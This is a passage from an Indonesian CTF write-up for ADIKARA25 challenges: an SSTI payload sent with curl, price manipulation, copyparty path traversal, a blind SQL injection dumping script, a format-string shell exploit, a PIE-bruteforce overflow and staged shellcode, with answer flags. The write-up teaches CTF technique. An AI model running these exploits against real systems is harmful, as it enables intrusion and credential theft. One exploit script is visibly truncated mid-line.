''' + template_msg + '''
...
'''
render_template_string(search_template)
```
* template_msg mengandung query user
* lalu dirender ulang oleh Jinja
jadi sudah fix ini bug SSTI.
tapi ada beberapa kata yang di-blacklist
```
blacklist = ["%", "\\", "/", "\"", "'", "`", "|", " ", "[", "]", "+",
"init", "subprocess", "globlas", "config", "update",
"mro", "subclasses", "class", "base", "builtins", ...]
```
ini tidak akan menjadi masalah karena:
* globals TIDAK diblok (yang diblok typo: globlas)
* _ boleh
* . boleh
* method call boleh
* __getitem__ boleh
* request.args TIDAK difilter
* filter hanya cek query, BUKAN URL args
saya minta tolong gpt buat bikin payload one shot nya.
`{{url_for.__globals__.__getitem__(request.args.b).__getitem__(request.args.o)(request.args.p).read()}}`
payload ini kalau dikirim lewat fitur search webnya tidak akan bisa. makanya kirim lewat curl
```
curl -k -X POST "https://pasar-sayur-segar.chall.adikara.online/search?b=__builtins__&o=open&p=/flag.txt" ^```
-H "Content-Type: application/x-www-form-urlencoded" ^
--data "query={{url_for.__globals__.__getitem__(request.args.b).__getitem__(request.args.o)(request.args.p).read()}}"
```
**Flag : ADIKARA25{cukurukempokjeru_qddjcvbiufuf23333}**
---
###
Legal Shop
320
Mendingan kualitas atau kuantitas?
`author: archanist`
https://legalsnack.chall.adikara.online/ dan chall.zip
saya langsung lempar source code nya ke gpt biar dia yang analisa karena saya MALAS.
langsung ketemu bug nya
```
if any(item.product.name == 'Elite Hacker Snack' for item in order.items):
return render_template(
'order_confirmation.html',
order=order,
flag=os.environ.get('FLAG', 'itdays25{lmao_flag}')
)
```
BUSINESS LOGIC / PRICE MANIPULATION
Exploit Strategy (INTI WRITE-UP)
1. Tambahkan Elite Hacker Snack (mahal)
2. Tambahkan item murah paling murah dengan quantity negatif (change post request pake caido)
3. Total jadi kecil tapi order tetap mengandung Elite Hacker Snack
4. Checkout → flag keluar
**Flag : ADIKARA25{t00_345y_15nt_1ttttttttttttt?}**
---
###
Party
350
This is a cool software that I found on the internet, I used it in my older project though, check them out!
https://party.chall.adikara.online & chall.zip
source code saya lempar gpt. hasil analisa:
* Root volume / = public RW
* Semua isi (a/, hack_*, hacker_*, flag.txt) adalah buatan user
* Flag challenge TIDAK disimpan di volume public
* Jadi ZIP / WebDAV / ls biasa TIDAK AKAN PERNAH nunjukin flag
bug nya ada di INFO LEAK + DEBUG FEATURE copyparty → baca file arbitrary di container lewat endpoint internal. buktinya adalah kita bisa akses /?stack. ini sudah cukup.
dan karena versi yang udah usang, exploit nya ada di google dengan keyword **CVE-2023-37474** yang intinya ada path traversal di sub-directory /.cpr/
https://party.chall.adikara.online/.cpr/%2Fapp%2Fflag.txt
**Flag : ADIKARA25{c0pyp@rty_15_n0t_p4rty1n9_24c58ce0895d218aa1c638d73733e64f}**
---
###
ASIK
500
bedanya hengker, DipeSer, sama Skrip kidi keliatan di challange ini.
contoh DipESer: https://asik.chall.adikara.online/admin/hubungi.php
`author: Tyzals`
ini adalah tampilan utama website nya. terdapat beberapa menu seperti login admin, form untuk hubungi mereka, dan cek kelulusan berdasarkan ID.
Saya awalnya fokus pada menu "Hubungi Kami"
saya pikir bug nya ada di stored xss dan ada bot admin yang menunggu payload dikirim. Saya sempet nunggu berjam jam buat dapetin cookie dari admin nya tapi ga nemu apa apa. akhirnya saya pindah endpoint jadi ke halaman utama, yaitu fitur cek kelulusan.
saya coba tes SQLI gabisa. akhirnya tanya gpt dia saranin pake query BLIND SQLI
**' OR '1'='1**
payload berhasil tereksekusi. di sini saya sempet stuck mau ngapain karena gaada apa apa lagi. panitia juga tidak memperbolehkan kami untuk memakai tools automatisasi seperti SQLMAP, GHAURI, DLL. tapi akhirnya saya membuat script automatisasi saya sendiri dengan payload blind sqli yang tentunya lebih ringan karena menggunakan query sederhana dan spesifik
ini payload final setelah saya dapet nama database, table, dan kolom (dicari satu satu bang aseli)
blind.py
```
import requests
import time
import sys
# --- KONFIGURASI ---
URL = "https://asik.chall.adikara.online/index.php?page=searchno"
SUCCESS_INDICATOR = 'btn-primary">Cetak'
# Target Tabel & Kolom
TARGET_TABLE = "tbl_user"
TARGET_COLS = ["username"] # Kita ambil username
# --- FUNGSI ---
def check_boolean(payload):
data = {'noujian': payload, 'SUBMIT': 'Cek Status'}
for i in range(3):
try:
r = requests.post(URL, data=data, timeout=20)
if SUCCESS_INDICATOR in r.text: return True
return False
except:
time.sleep(1)
# print(" [Retry] ", end='') # Uncomment kalau mau liat log retry
return False
def get_length(query):
# Cek panjang data (biasanya password md5 32 char, atau user biasa)
# Kita set range agak jauh biar aman (sampai 100 char)
for i in range(1, 100):
if check_boolean(f"x' OR (LENGTH(({query})) = {i})-- -"):
return i
sys.stdout.write(f"\r[~] Cek panjang: {i}")
sys.stdout.flush()
return None
def extract_data(query):
length = get_length(query)
if not length: return None
print(f" -> Panjang: {length}. Decoding...", end='')
val = ""
for pos in range(1, length + 1):
low, high = 32, 126
while low <= high:
mid = (low + high) // 2
if check_boolean(f"x' OR (ASCII(SUBSTRING(({query}), {pos}, 1)) > {mid})-- -"):
low = mid + 1
else:
high = mid - 1
val += chr(low)
sys.stdout.write(chr(low))
sys.stdout.flush()
return val
# --- EKSEKUSI: DUMP DATA TBL_USER ---
print(f"\n{'='*50}")
print(f"DUMPING DATA: {TARGET_TABLE}")
print(f"Kolom: {', '.join(TARGET_COLS)}")
print(f"{'='*50}")
offset = 0
while True:
print(f"\n[+] Data Row ke-{offset+1}...", end='')
# Query: SELECT CONCAT_WS(' : ', username, pass) FROM tbl_user LIMIT offset,1
# Kita pakai CONCAT_WS biar ada pemisah ':' antara username dan password
col_selector = f"CONCAT_WS(' : ', {', '.join(TARGET_COLS)})"
query = f"SELECT {col_selector} FROM {TARGET_TABLE} LIMIT {offset},1"
result = extract_data(query)
if not result:
print("\n\n[-] Selesai. Data habis.")
break
print(f" [OK]")
print(f" >>> HASIL: {result}")
offset += 1
print("="*50)
```
**Flag : ADIKARA25{Njayyy_R1ll_Hangker_Cokkkkk}**
---
##
Pwn
###
Date
310
get the current date.
`author: archanist`
diberikan file chall. dan ncat --ssl date.chall.adikara.online 443
analisis cepat:
1. Kode program menggunakan fungsi printf(buffer) secara langsung untuk mencetak input user tanpa format specifier (seharusnya printf("%s", buffer)). Hal ini memungkinkan user memasukkan karakter format string seperti %x, %p, atau %n yang akan dieksekusi oleh printf
2. **Attack Vector (Celah Serangan)**
Vulnerability: Format String (CWE-134).
Target: Terdapat variabel global bernama command (alamat 0x404060) yang secara default berisi string "date".
Execution: Variabel ini kemudian diteruskan ke fungsi system(command).
3. **Exploitation Logic (Logika Eksploitasi)**
Tujuannya adalah mengubah isi variabel command dari "date" menjadi "sh" agar program memberikkan akses shell.
solver.py (disini saya udah tau offset nya 6)
```
from pwn import *
HOST = "date.chall.adikara.online"
PORT = 443
context.arch = "amd64"
context.log_level = "info"
CMD = 0x404060 # global 'command' dari binary non-PIE kamu
def run(off):
io = remote(HOST, PORT, ssl=True, sni=HOST)
# baca prompt kalau ada
io.recvuntil(b"Enter your name:", timeout=2)
# biarin pwntools yang split jadi %hn/%hhn tanpa overlap
payload = fmtstr_payload(off, {CMD: b"/bin/sh\x00"}, write_size="short")
io.sendline(payload)
# kalau sukses, setelah ini program jalan:
# puts(...) lalu system(command) -> system("/bin/sh")
# coba tes cepat
io.sendline(b"id")
out = io.recvrepeat(1.0)
if b"uid=" in out:
log.success(f"Shell OK at offset {off}")
io.interactive()
else:
log.warning(f"Offset {off} no shell (got: {out!r})")
io.close()
if __name__ == "__main__":
# karena dari leak kamu input mulai di %6$p, offset biasanya dekat-dekat situ
for off in range(6, 25):
try:
log.info(f"Trying offset {off} ...")
run(off)
except EOFError:
log.warning(f"Offset {off} EOF")
except Exception as e:
log.warning(f"Offset {off} error: {e}")
```
**Flag : ADIKARA25{th15_15_5upp0553d_t0_b3_34sy_r1ght80f4eb9b761f3d009d3bf5f37a868897}**
---
###
Pie shop
360
I've just opened my PIE shop, would you like to visit?
`author: archanist`
diberikan file chall dan ncat pieshop.chall.adikara.online 443 --ssl
challenge ini adalah binary PIE enabled yang punya buffer overflow di fitur custom order.
Tujuan kita: redirect control flow ke fungsi tersembunyi (secret menu / win).
Proteksi yang aktif:
* NX
* PIE
Karena PIE aktif, alamat fungsi selalu berubah setiap run → harus ditebak / dibocorkan.
Di menu “Custom Order”, program membaca input tanpa batas panjang ke buffer stack.
berarti kita bisa overflow buffer & overwrite return address (RIP).
Tapi Karena PIE, kita tidak tahu alamat win function secara pasti
Solusinya: bruteforce PIE (low 16 bit)
pie.py
```
import socket, ssl, struct, time
HOST = "pieshop.chall.adikara.online"
PORT = 443
def make_ssl():
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return ctx
def read_for(s, seconds=2.5):
end = time.time() + seconds
data = b""
s.settimeout(0.2)
while time.time() < end:
try:
chunk = s.recv(8192)
if not chunk:
# EOF
break
data += chunk
except:
pass
time.sleep(0.01)
return data
def recvuntil(s, token=b"> ", max_seconds=3.0):
data = b""
end = time.time() + max_seconds
s.settimeout(0.2)
while time.time() < end and token not in data:
try:
chunk = s.recv(8192)
if not chunk:
break
data += chunk
except:
pass
time.sleep(0.01)
return data
def setup_underflow(s):
recvuntil(s, b"> ")
s.sendall(b"1\n")
recvuntil(s, b"(yes/no) > ")
s.sendall(b"no\n")
recvuntil(s, b"> ")
s.sendall(b"2\n")
recvuntil(s, b"> ")
s.sendall(b"1\n")
recvuntil(s, b"(yes/no) > ")
s.sendall(b"yes\n")
recvuntil(s, b"> ")
s.sendall(b"3\n") # secret menu
def attempt(low16):
ctx = make_ssl()
sock = socket.create_connection((HOST, PORT), timeout=5)
s = ctx.wrap_socket(sock, server_hostname=HOST)
full = b""
try:
setup_underflow(s)
full += read_for(s, 0.6)
# custom order + overflow (newline + 87 pad + 2 bytes = 90 bytes)
payload = b"\n" + b"A"*87 + struct.pack("
", 2.0)
# trigger ret
s.sendall(b"4\n")
# baca agak lama, biar keburu lihat output win kalau ada
full += read_for(s, 3.0)
return full
finally:
try: s.close()
except: pass
# kandidat low16 (win low16 = base_low16 + 0x1289)
cands = [((0x1289 + i*0x1000) & 0xffff) for i in range(16)]
# ulangi beberapa putaran (PIE berubah tiap koneksi, jadi ini normal)
for round_idx in range(1, 21):
print(f"\n===== ROUND {round_idx} =====")
for low16 in cands:
out = attempt(low16)
text = out.decode(errors="ignore")
low = out.lower()
hit = (b"ingredient" in low) or (b"flag" in low) or (b"you tried a few times huh" in low)
print(f"[{hex(low16)}] hit={hit} bytes={len(out)}")
if hit:
print("\n--- OUTPUT ---")
print(text)
print("-------------")
raise SystemExit
```
**Flag : ADIKARA25{d0_y0u_l1k3_p135?45658509c52153b3e9682df9ec008314}**
---
### metamorfosis
420
hanya beberapa byte yang dibolehkan...
`author: archanist`
diberikan file chall & ncat metamorfosis.chall.adikara.online 443 --ssl
1. Temuan Analisis:
Program membuat area memori khusus di alamat 0x13370000 yang bisa dieksekusi (RWX).
Program meminta input, tapi hanya membaca 6 byte.
Setelah membaca, program langsung mengeksekusi input tersebut sebagai kode mesin (assembly).
2. Kendala Utama
Untuk mendapatkan shell, biasanya kita butuh kode (shellcode) yang melakukan execve("/bin/sh"). Masalahnya, shellcode standar membutuhkan 27-30 byte. Kita punya masalah fisik: "Bagaimana memasukkan gajah (30 byte) ke dalam kulkas mini (6 byte)?"
3. Solusi: Multi-Stage Shellcode (Teknik Stager)
Karena pintu masuknya kecil, kita tidak bisa langsung mengirim virus utamanya. Kita membagi serangan menjadi dua tahap:
Stage 1 (Si Kecil): Kode super pendek (max 6 byte) yang tugasnya cuma satu: menyuruh sistem untuk membuka pintu input lagi (memanggil fungsi read lagi) tapi kali ini dengan kapasitas besar.
Stage 2 (Si Besar): Shellcode asli kita yang akan dikirim setelah Stage 1 berhasil membuka jalan.
Syarat Syscall Read:
```
RAX = 0 (Nomor syscall read) -> Kebetulan sudah 0.
RDI = 0 (File Descriptor stdin) -> Perlu kita set.
RSI = Alamat Buffer (0x13370000) -> Ada di RDX, perlu dipindah.
RDX = Ukuran Baca -> Kebetulan isinya pointer besar, cukup untuk ukuran.
```
Kode Assembly (6 Byte):
solve.py
```
from pwn import *
# 1. Konek ke server
p = remote('metamorfosis.chall.adikara.online', 443, ssl=True)
# 2. Kirim Stage 1 (6 Byte Loader)
# push rdx; pop rsi; xor edi, edi; syscall
stage1 = b"\x52\x5e\x31\xff\x0f\x05"
p.send(stage1)
# Tunggu sebentar biar stage 1 tereksekusi
import time; time.sleep(1)
# 3. Kirim Stage 2 (Shellcode Asli)
# Shellcode Linux x64 execve("/bin/sh")
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# Padding 6 byte di awal untuk menyesuaikan posisi CPU
payload = b'\x90'*6 + shellcode
p.send(payload)
# 4. Ambil Flag
p.interactive()
```
Memori: [ Sampah 6 Byte ] + [ Shellcode Asli ]
**Flag : ADIKARA25{w3ll_w3ll_w3ll!_39047cb2a125b68fd3c16c4280f97a70}**
---
## Reverse Engineering
### Snake
320
I bet you can't reach 99,999 points!
Author : `Cyrus`
diberikan file snake. saya malas RE jadi saya check dulu kalau ini base nya python bukan
karena ini python dan versinya paling terbaru, jadi saya pake tools pyinstxtractor buat nge extract.
ada snake.pyc lalu saya decompile pake pycdc
~/Desktop/pycdc/pycdc snake.pyc > source_asli.py
solve.py
```
import base64
# 1. Data dari hasil decompile kamu
key_b64 = b'czNjcjN0LWszeQ=='
flag_obf_b64 = b'MncqOXImbFkGAgBdVxkAK0pfXkosAhAtXg1yDQcPQ0FSBgArSl9eSixEFgVsBx5YbABDRjxDXStLWl1NH04='
# 2. Decode Base64 ke bentuk bytes asli
key_bytes = base64.b64decode(key_b64)
flag_encrypted_bytes = base64.b64decode(flag_obf_b64)
print(f"Key: {key_bytes}")
# Output key harusnya: b's3cr3t-k3y'
# 3. Lakukan Decrypt (XOR Operation)
# Logic: ciphertext XOR key = plaintext
decrypted_flag = []
for i in range(len(flag_encrypted_bytes)):
# Ambil byte cipher ke-i
cipher_byte = flag_encrypted_bytes[i]
# Ambil byte key (gunakan modulus % agar key berulang jika flag lebih panjang dari key)
key_byte = key_bytes[i % len(key_bytes)]
# XOR kan
decrypted_flag.append(cipher_byte ^ key_byte)
# 4. Tampilkan hasil
result = bytes(decrypted_flag)
print("\n[+] FLAG FOUND:")
print(result.decode('utf-8', errors='ignore'))
```
**Flag : ADIKARA25{sn4k3_g4m3_1s_my_f4v0r1t3_g4m3_wuw_s33_y0u_1n_f1n4l}**
---